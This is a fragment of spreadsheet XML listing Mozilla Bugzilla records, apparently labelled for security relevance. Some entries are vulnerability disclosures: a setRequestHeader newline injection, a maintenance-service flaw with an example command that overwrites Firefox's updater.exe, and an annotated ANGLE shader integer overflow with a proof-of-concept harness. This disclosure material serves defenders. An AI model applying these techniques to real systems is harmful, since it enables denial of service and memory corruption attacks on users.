      <c r="L2517" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2517" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2517" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2517" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2517" t="inlineStr">
        <is>
          <t>[Fix moved to bug 913614][adv-main25+][adv-est1710+][esr-24-1+]</t>
        </is>
      </c>
      <c r="Q2517" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2517" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2517" t="inlineStr">
        <is>
          <t>mozilla29</t>
        </is>
      </c>
      <c r="T2517" t="n">
        <v>1</v>
      </c>
      <c r="U2517" t="n">
        <v>0</v>
      </c>
      <c r="V2517" t="n">
        <v>106</v>
      </c>
      <c r="W2517" t="inlineStr">
        <is>
          <t>Created attachment 775365
testcase
if (isGradient(aPattern)) {
    // There's no CGContextClipStrokeRect so we do it by hand
    CGContextBeginPath(cg);
    CGContextAddRect(cg, RectToCGRect(aRect));
    CGContextReplacePathWithStrokedPath(cg);
    //XXX: should we use EO clip here?
    CGContextClip(cg);
    DrawGradient(cg, aPattern);
  } else {
    SetStrokeFromPattern(cg, mColorSpace, aPattern);
*   CGContextStrokeRect(cg, RectToCGRect(aRect));
  }
Tested with http://hg.mozilla.org/integration/mozilla-inbound/rev/fa6ef0b63025</t>
        </is>
      </c>
      <c r="X2517" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2518">
      <c r="A2518" t="n">
        <v>812779</v>
      </c>
      <c r="B2518" t="inlineStr">
        <is>
          <t>2012-11-17 06:08:08 -0800</t>
        </is>
      </c>
      <c r="C2518" t="inlineStr">
        <is>
          <t>Tracking bug for build and release of SeaMonkey 2.14</t>
        </is>
      </c>
      <c r="D2518" t="inlineStr">
        <is>
          <t>2019-06-16 01:35:43 -0700</t>
        </is>
      </c>
      <c r="E2518" t="n">
        <v>1</v>
      </c>
      <c r="F2518" t="n">
        <v>1</v>
      </c>
      <c r="G2518" t="n">
        <v>2</v>
      </c>
      <c r="H2518" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2518" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J2518" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="K2518" t="inlineStr">
        <is>
          <t>SeaMonkey 2.14 Branch</t>
        </is>
      </c>
      <c r="L2518" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2518" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2518" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2518" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2518" t="inlineStr"/>
      <c r="Q2518" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2518" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2518" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2518" t="n">
        <v>1</v>
      </c>
      <c r="U2518" t="n">
        <v>0</v>
      </c>
      <c r="V2518" t="n">
        <v>8</v>
      </c>
      <c r="W2518" t="inlineStr">
        <is>
          <t>This is a tracking bug for Build and Release of SeaMonkey 2.14
We expect an actual release on Monday 19th November.</t>
        </is>
      </c>
      <c r="X2518" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2519">
      <c r="A2519" t="n">
        <v>701142</v>
      </c>
      <c r="B2519" t="inlineStr">
        <is>
          <t>2011-11-09 12:34:48 -0800</t>
        </is>
      </c>
      <c r="C2519" t="inlineStr">
        <is>
          <t>[traceback] NoReverseMatch: Reverse for 'jp_browser_user_addons' with arguments '(u'erik-vold',)' and keyword arguments '{}' not found.</t>
        </is>
      </c>
      <c r="D2519" t="inlineStr">
        <is>
          <t>2014-09-24 06:39:12 -0700</t>
        </is>
      </c>
      <c r="E2519" t="n">
        <v>1</v>
      </c>
      <c r="F2519" t="n">
        <v>1</v>
      </c>
      <c r="G2519" t="n">
        <v>6</v>
      </c>
      <c r="H2519" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2519" t="inlineStr">
        <is>
          <t>addons.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J2519" t="inlineStr">
        <is>
          <t>Add-on Builder</t>
        </is>
      </c>
      <c r="K2519" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2519" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2519" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2519" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2519" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2519" t="inlineStr"/>
      <c r="Q2519" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2519" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2519" t="inlineStr">
        <is>
          <t>Builder 1.0</t>
        </is>
      </c>
      <c r="T2519" t="n">
        <v>1</v>
      </c>
      <c r="U2519" t="n">
        <v>0</v>
      </c>
      <c r="V2519" t="n">
        <v>6</v>
      </c>
      <c r="W2519" t="inlineStr">
        <is>
          <t>https://builder-addons-dev.allizom.org/user/1010542/ yields:
Traceback (most recent call last):
  File "/data/www/builder-addons-dev.allizom.org/flightdeck/vendor/lib/python/django/core/handlers/base.py", line 111, in get_response
    response = callback(request, *callback_args, **callback_kwargs)
  File "/data/www/builder-addons-dev.allizom.org/flightdeck/apps/person/views.py", line 32, in public_profile
    }, context_instance=RequestContext(r))
  File "/data/www/builder-addons-dev.allizom.org/flightdeck/vendor/lib/python/django/shortcuts/__init__.py", line 20, in render_to_response
    return HttpResponse(loader.render_to_string(*args, **kwargs), **httpresponse_kwargs)
  File "/data/www/builder-addons-dev.allizom.org/flightdeck/vendor/lib/python/django/template/loader.py", line 188, in render_to_string
    return t.render(context_instance)
  File "/data/www/builder-addons-dev.allizom.org/flightdeck/vendor/src/jingo/jingo/__init__.py", line 189, in render
    return super(Template, self).render(context_dict)
  File "/data/www/builder-addons-dev.allizom.org/flightdeck/vendor/lib/python/jinja2/environment.py", line 891, in render
    return self.environment.handle_exception(exc_info, True)
  File "/data/www/builder-addons-dev.allizom.org/flightdeck/apps/person/templates/profile.html", line 1, in top-level template code
    {% extends "base.html" %}
  File "/data/www/builder-addons-dev.allizom.org/flightdeck/apps/base/templates/base.html", line 82, in top-level template code
    {% block base_fluid_width %}
  File "/data/www/builder-addons-dev.allizom.org/flightdeck/apps/base/templates/base.html", line 85, in block "base_fluid_width"
    {% block app_sidebar %}{%endblock %}
  File "/data/www/builder-addons-dev.allizom.org/flightdeck/apps/person/templates/profile.html", line 21, in block "app_sidebar"
    &lt;a title="Add-ons" href="{{ profile.get_addons_url() }}"&gt;Add-ons&lt;/a&gt;
  File "/data/www/builder-addons-dev.allizom.org/flightdeck/apps/person/models.py", line 50, in get_addons_url
    return reverse('jp_browser_user_addons', args=[self.get_nickname()])
  File "/data/www/builder-addons-dev.allizom.org/flightdeck/vendor/lib/python/django/core/urlresolvers.py", line 391, in reverse
    *args, **kwargs)))
  File "/data/www/builder-addons-dev.allizom.org/flightdeck/vendor/lib/python/django/core/urlresolvers.py", line 337, in reverse
    "arguments '%s' not found." % (lookup_view_s, args, kwargs))
NoReverseMatch: Reverse for 'jp_browser_user_addons' with arguments '(u'erik-vold',)' and keyword arguments '{}' not found.</t>
        </is>
      </c>
      <c r="X2519" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2520">
      <c r="A2520" t="n">
        <v>297078</v>
      </c>
      <c r="B2520" t="inlineStr">
        <is>
          <t>2005-06-08 08:22:19 -0700</t>
        </is>
      </c>
      <c r="C2520" t="inlineStr">
        <is>
          <t>setRequestHeader can be exploited using newline characters</t>
        </is>
      </c>
      <c r="D2520" t="inlineStr">
        <is>
          <t>2006-08-20 18:16:32 -0700</t>
        </is>
      </c>
      <c r="E2520" t="n">
        <v>1</v>
      </c>
      <c r="F2520" t="n">
        <v>1</v>
      </c>
      <c r="G2520" t="n">
        <v>3</v>
      </c>
      <c r="H2520" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2520" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2520" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K2520" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2520" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2520" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N2520" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2520" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2520" t="inlineStr">
        <is>
          <t>[sg:fix]  [ready to land]</t>
        </is>
      </c>
      <c r="Q2520" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2520" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2520" t="inlineStr">
        <is>
          <t>mozilla1.8alpha4</t>
        </is>
      </c>
      <c r="T2520" t="n">
        <v>1</v>
      </c>
      <c r="U2520" t="n">
        <v>0</v>
      </c>
      <c r="V2520" t="n">
        <v>57</v>
      </c>
      <c r="W2520" t="inlineStr">
        <is>
          <t>Mozilla allows the value field of XMLHttpRequest setRequestHeaders to contain 
newline characters.  A malicious author could use two newline characters to end 
the headers sent by the client.  Thus, the author has the ability to send 
arbitrary data to the server.  On a shared host, this could lead to data theft 
situations.
I have not tested whether Mozilla allows newline characters in the the header 
field of setRequestHeader, but the same problem would occur there.  Furthermore, 
similiar vulnerabilites could occur if Mozilla allows linefeed and carriage 
return characters in header and value fields, as well as colon characters in the 
header fields.  I have not tested any of these situations.
I have notified Ian Hickson to update the WHAT WG spec.</t>
        </is>
      </c>
      <c r="X2520" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2521">
      <c r="A2521" t="n">
        <v>1336964</v>
      </c>
      <c r="B2521" t="inlineStr">
        <is>
          <t>2017-02-06 06:01:02 -0800</t>
        </is>
      </c>
      <c r="C2521" t="inlineStr">
        <is>
          <t>Arbitrary file "deletion" as SYSTEM with maintenance service</t>
        </is>
      </c>
      <c r="D2521" t="inlineStr">
        <is>
          <t>2024-05-30 09:25:46 -0700</t>
        </is>
      </c>
      <c r="E2521" t="n">
        <v>1</v>
      </c>
      <c r="F2521" t="n">
        <v>1</v>
      </c>
      <c r="G2521" t="n">
        <v>3</v>
      </c>
      <c r="H2521" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2521" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J2521" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K2521" t="inlineStr">
        <is>
          <t>51 Branch</t>
        </is>
      </c>
      <c r="L2521" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2521" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N2521" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2521" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2521" t="inlineStr">
        <is>
          <t>[adv-main54+][adv-esr52.2+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q2521" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2521" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2521" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T2521" t="n">
        <v>1</v>
      </c>
      <c r="U2521" t="n">
        <v>0</v>
      </c>
      <c r="V2521" t="n">
        <v>10</v>
      </c>
      <c r="W2521" t="inlineStr">
        <is>
          <t>Created attachment 8833966
proof-of-concept
An unprivileged (standard) user can use the maintenance service to overwrite arbitrary files with junk data. There is no control over what is written to the target file, though the absence of the original data effectively "deletes" it.
For example, running the poc with clobber_file.rb "C:\Program Files (x86)\Mozilla Firefox\updater.exe" will lock firefox to the current installed version until an administrator repairs the installation because the existing updater.exe cannot be loaded to be verified.
The root cause seems to be that if GetTempFileNameW in WriteStatusFailure [0] is called with a path like '\\.\c:\foo\clobbered', instead of returning a temporary file like '\\.\c:\foo\clobbered\svc123.tmp', it just returns the input path. WriteStatusFailure then directly writes to the temporary path [1], truncating it's contents with the results of the updater.
WriteStatusFailure can be called with a user-supplied directory in a few places, the easiest way is to put the target in the first argument and not supply enough further arguments to cause GetInstallationDir in ExecuteServiceCommand to fail [2]. This is how the attached clobber_file.rb proof of concept works.
I haven't tested, but I think the calls in UpdaterIsValid would also be able to be purposely failed with an attacker controlled directory for update.status to get written into. Possibly some of the calls after that point as well, but it gets more difficult once the updater directory is verified as legitimate.
I also tested using hardlinks to redirect the update.status file while using a normal file path to trigger the overwrite - this does not seem to be possible as the maintenance service re-creates the file (which deletes the hardlink, rather than the file that is points to).
Tested on Windows 8.1 x64, Firefox 51.0.1 as well as mozilla-central.
[0] - https://dxr.mozilla.org/mozilla-central/rev/1d025ac534a6333a8170a59a95a8a3673d4028ee/toolkit/mozapps/update/common/updatehelper.cpp#276
[1] - https://dxr.mozilla.org/mozilla-central/rev/1d025ac534a6333a8170a59a95a8a3673d4028ee/toolkit/mozapps/update/common/updatehelper.cpp#288
[2] - https://dxr.mozilla.org/mozilla-central/rev/1d025ac534a6333a8170a59a95a8a3673d4028ee/toolkit/components/maintenanceservice/workmonitor.cpp#601</t>
        </is>
      </c>
      <c r="X2521" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2522">
      <c r="A2522" t="n">
        <v>1344539</v>
      </c>
      <c r="B2522" t="inlineStr">
        <is>
          <t>2017-03-05 02:42:16 -0800</t>
        </is>
      </c>
      <c r="C2522" t="inlineStr">
        <is>
          <t>Crash in ProcessExecutableMemory::allocate</t>
        </is>
      </c>
      <c r="D2522" t="inlineStr">
        <is>
          <t>2018-02-22 06:59:42 -0800</t>
        </is>
      </c>
      <c r="E2522" t="n">
        <v>1</v>
      </c>
      <c r="F2522" t="n">
        <v>1</v>
      </c>
      <c r="G2522" t="n">
        <v>3</v>
      </c>
      <c r="H2522" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2522" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2522" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K2522" t="inlineStr">
        <is>
          <t>52 Branch</t>
        </is>
      </c>
      <c r="L2522" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2522" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N2522" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2522" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2522" t="inlineStr"/>
      <c r="Q2522" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2522" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2522" t="inlineStr">
        <is>
          <t>mozilla60</t>
        </is>
      </c>
      <c r="T2522" t="n">
        <v>1</v>
      </c>
      <c r="U2522" t="n">
        <v>0</v>
      </c>
      <c r="V2522" t="n">
        <v>27</v>
      </c>
      <c r="W2522" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-2af8c4be-a324-403e-90c2-11a4f2170305.
=============================================================
Crashing Thread (0)
Frame 	Module 	Signature 	Source
0 	xul.dll 	ProcessExecutableMemory::allocate(unsigned int, js::jit::ProtectionSetting) 	js/src/jit/ProcessExecutableMemory.cpp:553
1 	xul.dll 	js::jit::ExecutableAllocator::createPool(unsigned int) 	js/src/jit/ExecutableAllocator.cpp:221
2 	xul.dll 	js::jit::ExecutableAllocator::poolForSize(unsigned int) 	js/src/jit/ExecutableAllocator.cpp:158
3 	xul.dll 	js::jit::Linker::newCode&lt;1&gt;(JSContext*, js::jit::CodeKind, bool) 	js/src/jit/Linker.cpp:36
4 	xul.dll 	js::jit::IonCache::linkCode(JSContext*, js::jit::MacroAssembler&amp;, js::jit::IonCache::StubAttacher&amp;, js::jit::IonScript*, js::jit::JitCode**) 	js/src/jit/IonCaches.cpp:284
5 	xul.dll 	js::jit::IonCache::linkAndAttachStub(JSContext*, js::jit::MacroAssembler&amp;, js::jit::IonCache::StubAttacher&amp;, js::jit::IonScript*, char const*, JS::TrackedOutcome) 	js/src/jit/IonCaches.cpp:316
6 	xul.dll 	js::jit::GetPropertyIC::tryAttachNative(JSContext*, JS::Handle&lt;JSScript*&gt;, js::jit::IonScript*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, void*, bool*) 	js/src/jit/IonCaches.cpp:1532
7 	xul.dll 	js::jit::GetPropertyIC::tryAttachStub(JSContext*, JS::Handle&lt;JSScript*&gt;, js::jit::IonScript*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, bool*) 	js/src/jit/IonCaches.cpp:2196
8 	mozglue.dll 	mozglue.dll@0x479f
this crash signature on windows 32bit &amp; 64bit builds of firefox was first showing up in 52.0b5 and regularly thereafter. it looks related to the uplifts in bug 1334933</t>
        </is>
      </c>
      <c r="X2522" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2523">
      <c r="A2523" t="n">
        <v>1879939</v>
      </c>
      <c r="B2523" t="inlineStr">
        <is>
          <t>2024-02-12 11:26:59 -0800</t>
        </is>
      </c>
      <c r="C2523" t="inlineStr">
        <is>
          <t>Assertion failure: volatileLiveRegs.has(ReturnRegVal0), at jit/arm/MacroAssembler-arm.cpp:5994</t>
        </is>
      </c>
      <c r="D2523" t="inlineStr">
        <is>
          <t>2024-09-16 09:18:26 -0700</t>
        </is>
      </c>
      <c r="E2523" t="n">
        <v>1</v>
      </c>
      <c r="F2523" t="n">
        <v>1</v>
      </c>
      <c r="G2523" t="n">
        <v>3</v>
      </c>
      <c r="H2523" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2523" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2523" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K2523" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2523" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2523" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2523" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2523" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2523" t="inlineStr">
        <is>
          <t>[adv-main124+][adv-esr115.9+]</t>
        </is>
      </c>
      <c r="Q2523" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2523" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S2523" t="inlineStr">
        <is>
          <t>124 Branch</t>
        </is>
      </c>
      <c r="T2523" t="n">
        <v>1</v>
      </c>
      <c r="U2523" t="n">
        <v>0</v>
      </c>
      <c r="V2523" t="n">
        <v>23</v>
      </c>
      <c r="W2523" t="inlineStr">
        <is>
          <t>Created attachment 9379782
debug stack
```
var x = 2;
(1).toString(x)[0];
for (var y = 0; y &lt; 1; y++) {}
```
```
(gdb) bt
#0  js::jit::MacroAssembler::flexibleDivMod32 (this=0xf63bb318, rhs=..., 
    lhsOutput=..., remOutput=..., isUnsigned=&lt;optimized out&gt;, volatileLiveRegs=...)
    at /home/gen32gx500/trees/mozilla-central/js/src/jit/arm/MacroAssembler-arm.cpp:5994
#1  0x591f9d9e in js::jit::MacroAssembler::loadInt32ToStringWithBase (
    this=0xf63bb318, input=..., base=..., dest=..., scratch1=..., scratch2=..., 
    staticStrings=..., volatileRegs=..., lowerCase=&lt;optimized out&gt;, fail=0xf63d1414)
    at /home/gen32gx500/trees/mozilla-central/js/src/jit/MacroAssembler.cpp:1884
#2  0x58f9d5c7 in js::jit::CodeGenerator::visitInt32ToStringWithBase (
    this=0xf63bb300, lir=0xf63ce6d8)
    at /home/gen32gx500/trees/mozilla-central/js/src/jit/CodeGenerator.cpp:10821
#3  0x58f78f9e in js::jit::CodeGenerator::generateBody (this=0xf63bb300)
    at /home/gen32gx500/trees/mozilla-central/js/src/jit/CodeGenerator.cpp:7388
#4  0x58fdedb1 in js::jit::CodeGenerator::generate (this=0xf63bb300)
    at /home/gen32gx500/trees/mozilla-central/js/src/jit/CodeGenerator.cpp:15230
#5  0x5902ae72 in js::jit::GenerateCode (mir=0xf63ca100, lir=0xf63cda08)
    at /home/gen32gx500/trees/mozilla-central/js/src/jit/Ion.cpp:1585
#6  js::jit::CompileBackEnd (mir=0xf63ca100, snapshot=0xf63ca518)
    at /home/gen32gx500/trees/mozilla-central/js/src/jit/Ion.cpp:1614
#7  0x5902c285 in js::jit::IonCompile (cx=0xf7614100, script=..., 
    osrPc=&lt;optimized out&gt;)
    at /home/gen32gx500/trees/mozilla-central/js/src/jit/Ion.cpp:1736
#8  js::jit::Compile (cx=0xf7614100, script=..., osrFrame=&lt;optimized out&gt;, 
    osrPc=0xf7603b12 "\227\b")
    at /home/gen32gx500/trees/mozilla-central/js/src/jit/Ion.cpp:1890
#9  0x5902ce8e in BaselineCanEnterAtBranch (cx=0xf7614100, osrFrame=0xf67fff08, 
    script=..., pc=&lt;optimized out&gt;)
    at /home/gen32gx500/trees/mozilla-central/js/src/jit/Ion.cpp:2091
#10 IonCompileScriptForBaseline (cx=&lt;optimized out&gt;, frame=0xf67fff08, 
    pc=0xf7603b12 "\227\b")
    at /home/gen32gx500/trees/mozilla-central/js/src/jit/Ion.cpp:2143
#11 0x5902d7f7 in js::jit::IonCompileScriptForBaselineOSR (cx=0xf7614100, 
    frame=0xf67fff08, frameSize=48, pc=0xf7603b12 "\227\b", infoPtr=0xf67ffee8)
    at /home/gen32gx500/trees/mozilla-central/js/src/jit/Ion.cpp:2255
/snip
```
Run with `--fuzzing-safe --no-threads --ion-eager --arm-hwcap=vfp`, compile with `PKG_CONFIG_PATH=/usr/lib/x86_64-linux-gnu/pkgconfig AR=ar 'CC="clang -msse2 -mfpmath=sse"' 'CXX="clang++ -msse2 -mfpmath=sse"' sh ../configure --host=x86_64-pc-linux-gnu --target=i686-pc-linux --enable-simulator=arm --enable-debug --enable-debug-symbols --with-ccache --enable-gczeal --enable-rust-simd --disable-tests`, tested on m-c rev 13676fc9b0cd.
This seems to regress somewhere between m-c rev fac963c3bc00 (Aug 2022) and m-c rev e963fffcb3a0 (Jun 2023) but I'm still digging more into this.
Setting s-s to be safe.</t>
        </is>
      </c>
      <c r="X2523" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2524">
      <c r="A2524" t="n">
        <v>1864587</v>
      </c>
      <c r="B2524" t="inlineStr">
        <is>
          <t>2023-11-13 20:46:42 -0800</t>
        </is>
      </c>
      <c r="C2524" t="inlineStr">
        <is>
          <t>Validation bypass in ANGLE Translator leads to an OOB read/write.</t>
        </is>
      </c>
      <c r="D2524" t="inlineStr">
        <is>
          <t>2024-05-30 11:16:02 -0700</t>
        </is>
      </c>
      <c r="E2524" t="n">
        <v>1</v>
      </c>
      <c r="F2524" t="n">
        <v>1</v>
      </c>
      <c r="G2524" t="n">
        <v>3</v>
      </c>
      <c r="H2524" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2524" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2524" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K2524" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2524" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2524" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2524" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2524" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2524" t="inlineStr">
        <is>
          <t xml:space="preserve">[reporter-external] [client-bounty-form] [verif?] [adv-main122+][adv-esr115.7+] </t>
        </is>
      </c>
      <c r="Q2524" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2524" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S2524" t="inlineStr">
        <is>
          <t>123 Branch</t>
        </is>
      </c>
      <c r="T2524" t="n">
        <v>1</v>
      </c>
      <c r="U2524" t="n">
        <v>0</v>
      </c>
      <c r="V2524" t="n">
        <v>34</v>
      </c>
      <c r="W2524" t="inlineStr">
        <is>
          <t># Steps to reproduce
1. Copy paste the HTML in a new HTML file and download fs.frag from attachments, place them in the same folder.
2. Run `python3 -m http.server 8008`.
3. Open firefox.
4. Access `localhost:8008/POC.html`.
5. Wait a few seconds.
# Vulnerability
While auditing ANGLE I found a validation bypass via crafted GLSL shader in ANGLE Translator[5] which ends up in a wild OOB read/write in `VariablePacker::fillColumns` called from `VariablePacker::checkExpandedVariablesWithinPackingLimits` function.
`VariablePacker::checkExpandedVariablesWithinPackingLimits` is used to pack uniforms within vec4s and also to check if the shader has too many uniforms.
```cpp
bool VariablePacker::checkExpandedVariablesWithinPackingLimits(
    unsigned int maxVectors,
    std::vector&lt;sh::ShaderVariable&gt; *variables)
{
    ASSERT(maxVectors &gt; 0);
    maxRows_          = maxVectors;
    topNonFullRow_    = 0; // &lt;-- [1] topNonFullRow_ is initially set to zero.
    // [...]
    rows_.clear();
    rows_.resize(maxVectors, 0); // &lt;-- [2] rows_ will be resized to `maxVectors` which is usually 4096 in a vertex shader and 1024 in a fragment shader.
    // Packs the 4 column variables.
    size_t ii = 0;
    for (; ii &lt; variables-&gt;size(); ++ii) // &lt;-- The for here will first pack our mat4 and vec4 uniforms. It's interesting for us to have some value here inside "topNonFullRows_" since we need to perform a integer overflow when using it in a sum inside [5].
    {
        const sh::ShaderVariable &amp;variable = (*variables)[ii];
        if (GetTypePackingComponentsPerRow(variable.type) != 4)
        {
            break;
        }
        topNonFullRow_ += GetVariablePackingRows(variable); 
    }
    if (topNonFullRow_ &gt; maxRows_) // &lt;-- [3] The final value of "topNonFullRow_" in the POC will be 1016 here, since in the test page I'm using a fragment shader.
    {
        return false;
    }
    // Packs the 3 column variables.
    int num3ColumnRows = 0;
    for (; ii &lt; variables-&gt;size(); ++ii)
    {
        const sh::ShaderVariable &amp;variable = (*variables)[ii];
        if (GetTypePackingComponentsPerRow(variable.type) != 3)
        {
            break;
        }
        num3ColumnRows += GetVariablePackingRows(variable); // &lt;-- [4] Here we are going to sum the number of rows of every mat3 uniform inside the shader.
    }
    if (topNonFullRow_ + num3ColumnRows &gt; maxRows_) // &lt;-- [5] And check if the sum of rows is greater than maxRows_. However, this check is bypassable since there's no limit of how many uniforms ANGLE Translator will receive in this step since the function we are right now *is* the one that'll calculate if we have too many uniforms. In the attached POC "num3ColumnRows" will be 2147482631 here. The sum "1016 + 2147482631" will evaluate to -1 since both are signed integers.
    {
        return false;
    }
    fillColumns(topNonFullRow_, num3ColumnRows, 0, 3); // &lt;-- [6] **Now we call "fillColumns" where our heap buffer overflow happens.**
    [...]
```
Now, let's take a look at the "fillColumns" function:
```cpp
    void VariablePacker::fillColumns(int topRow, int numRows, int column, int numComponentsPerRow)
    {
        unsigned columnFlags = makeColumnFlags(column, numComponentsPerRow);
        for (int r = 0; r &lt; numRows; ++r) &lt;-- [7] Here a for will start from 0 to numRows(2147482631) performing a wild OOB write from `rows_` memory.
        {
            int row = topRow + r;
            ASSERT((rows_[row] &amp; columnFlags) == 0);
            rows_[row] |= columnFlags; &lt;-- OOB write in "rows_" happens here.
        }
    }
```
HTML:
````
&lt;html&gt;
  &lt;head&gt;
    &lt;meta charset="utf-8" /&gt;
    &lt;title&gt;ANGLE POC&lt;/title&gt;
  &lt;/head&gt;
  &lt;body&gt;
    &lt;canvas&gt;&lt;/canvas&gt;
    &lt;script&gt;    
        const canvas = document.querySelector("canvas");
        canvas.width = 100;
        canvas.height = 100;
        const gl = canvas.getContext("webgl2");
        fetch('./fs.frag').then(async res =&gt; {
          const fragmentShaderSource = await res.text();
          const fragmentShader = gl.createShader(gl.FRAGMENT_SHADER);
          gl.shaderSource(fragmentShader, fragmentShaderSource);
          gl.compileShader(fragmentShader);
          const compiled = gl.getShaderParameter(fragmentShader, gl.COMPILE_STATUS);  
          console.log('Shader compile status: ' + compiled);
          let compilationLog = gl.getShaderInfoLog(fragmentShader);
          console.log('Shader compile log: ' + compilationLog);
        });
      &lt;/script&gt;
  &lt;/body&gt;
&lt;/html&gt;
```
"fs.frag" is attached.
# ASAN StackTrace:
=================================================================
==16627==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x5210019a8900 at pc 0x7fd87b5ff064 bp 0x7fd7e25af790 sp 0x7fd7e25af788
READ of size 4 at 0x5210019a8900 thread T18
